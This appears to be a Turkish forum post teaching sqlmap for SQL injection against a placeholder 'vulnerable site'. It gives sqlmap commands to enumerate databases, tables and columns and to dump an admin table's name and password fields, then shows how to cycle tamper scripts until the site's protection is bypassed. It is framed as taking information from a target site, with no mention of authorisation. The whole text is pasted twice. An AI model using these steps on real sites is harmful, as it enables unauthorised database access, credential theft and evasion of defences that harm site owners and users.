SQLMAP
Sqlmap sql enjeksiyonu yapmamıza yarayan son derece gelişmiş python proglamlama dili ile kodlanmış bir yazılımdır.
Oldukça güzel olan olan sqlmap kullanımının kolay olduğu için günümüzde fazla kullanılmaktadır.
Sqlmap aracı kali Linux üzerinde kurulu olarak gelir Windows için pentestbox aracını indirip kurmalarını tavisye ederim.
Şimdi geçelim Kullanımına
ilk olarak üçbirimi açıyoruz ve sqlmap yazıyoruz ve sqlmap geliyor sqlmap komutlarını görmek için -h yani help ile görebilirsiniz.
sqlmap -u http://sqlaçıklısite.com/index.php?cat=1 -dbs
yazarak sql enjeksiyonunun varlığını doğrulayabilir aynı zamanda veritabanı adı sürüm bilgisi gibi bilgilere erişebiliriz.
eğer erişemezseniz sitenin koruması vardır sqlmap i anlattıktan sonra ileri seviye güvenlik atlatmayı da anlatacağım.
yazdığımızda veri tabanı adı gelecek tablolara erişmek için -D ile bulunan veritabanı adını yazarak --tables komutuyla tabloların bulunmasını isteriz.
Örnek= sqlmap -u http://sqlaçıklısite.com/index.php?cat=1 -D acuart(veritabanı adı) --tables
bu kodla hedef sitenin tablolarına ulaşmış bulunuyoruz şimdi ise bulduğumuzda karşımıza users,admin gibi şeyler gelecektir(her zaman admin veya users yazmaybilir.) genellikle sitenin şifresi admin gibi tablolarda oluyor.
şimdi ise sqlmap -u http://sqlaçıklısite.com/index.php?cat=1 -D acuart(veri tabanı adı) -T admin -colums
-T ile belirterek kolonları buluyoruz.
bu sefer ise karsımıza name,pass gibi gelirse şu kodu yazıp
sqlmap -u http://sqlaçıklısite.com/index.php?cat=1 -D acuart -T admin -C name,pass -dump yazarak
bilgileri ele geçiriyoruz.
Sqlmap İleri seviye güvenlik atlatma
sqlmap -u http://sqlaçıklısite.com/index.php?cat=1 -dbs yazdığınızda veri tabanı karsınıza gelmediğinde sitenin güvenliği olduğunu anlarız
Burda yapılması gereken bazı tamperlar vardır tamperlara bakmak için
cd /usr/share/sqlmap/
yazıp sqlmap e geçiş yapıyoruz ardından ls yazıp içindeki dosyaları goruyoruz
cd /tamper/
ls -l
yazınca tamperlarımızın ismi çıkıyor
ve ardından
sqlmap -u http:/sqlaçıklısite.com/index.php?cat=1 --tamper=greatest(tamper adı) --dbs yazıyoruz.
ve güvenliği atlatana kadar tamper lerimizi deniyoruz
Oldukça güzel olan olan sqlmap kullanımının kolay olduğu için günümüzde fazla kullanılmaktadır.
Sqlmap aracı kali Linux üzerinde kurulu olarak gelir Windows için pentestbox aracını indirip kurmalarını tavisye ederim.
Şimdi geçelim Kullanımına
ilk olarak üçbirimi açıyoruz ve sqlmap yazıyoruz ve sqlmap geliyor sqlmap komutlarını görmek için -h yani help ile görebilirsiniz.
sqlmap -u http://sqlaçıklısite.com/index.php?cat=1 -dbs
yazarak sql enjeksiyonunun varlığını doğrulayabilir aynı zamanda veritabanı adı sürüm bilgisi gibi bilgilere erişebiliriz.
eğer erişemezseniz sitenin koruması vardır sqlmap i anlattıktan sonra ileri seviye güvenlik atlatmayı da anlatacağım.
yazdığımızda veri tabanı adı gelecek tablolara erişmek için -D ile bulunan veritabanı adını yazarak --tables komutuyla tabloların bulunmasını isteriz.
Örnek= sqlmap -u http://sqlaçıklısite.com/index.php?cat=1 -D acuart(veritabanı adı) --tables
bu kodla hedef sitenin tablolarına ulaşmış bulunuyoruz şimdi ise bulduğumuzda karşımıza users,admin gibi şeyler gelecektir(her zaman admin veya users yazmaybilir.) genellikle sitenin şifresi admin gibi tablolarda oluyor.
şimdi ise sqlmap -u http://sqlaçıklısite.com/index.php?cat=1 -D acuart(veri tabanı adı) -T admin -colums
-T ile belirterek kolonları buluyoruz.
bu sefer ise karsımıza name,pass gibi gelirse şu kodu yazıp
sqlmap -u http://sqlaçıklısite.com/index.php?cat=1 -D acuart -T admin -C name,pass -dump yazarak
bilgileri ele geçiriyoruz.
Sqlmap İleri seviye güvenlik atlatma
sqlmap -u http://sqlaçıklısite.com/index.php?cat=1 -dbs yazdığınızda veri tabanı karsınıza gelmediğinde sitenin güvenliği olduğunu anlarız
Burda yapılması gereken bazı tamperlar vardır tamperlara bakmak için
cd /usr/share/sqlmap/
yazıp sqlmap e geçiş yapıyoruz ardından ls yazıp içindeki dosyaları goruyoruz
cd /tamper/
ls -l
yazınca tamperlarımızın ismi çıkıyor
ve ardından
sqlmap -u http:/sqlaçıklısite.com/index.php?cat=1 --tamper=greatest(tamper adı) --dbs yazıyoruz.
ve güvenliği atlatana kadar tamper lerimizi deniyoruz
Last edited: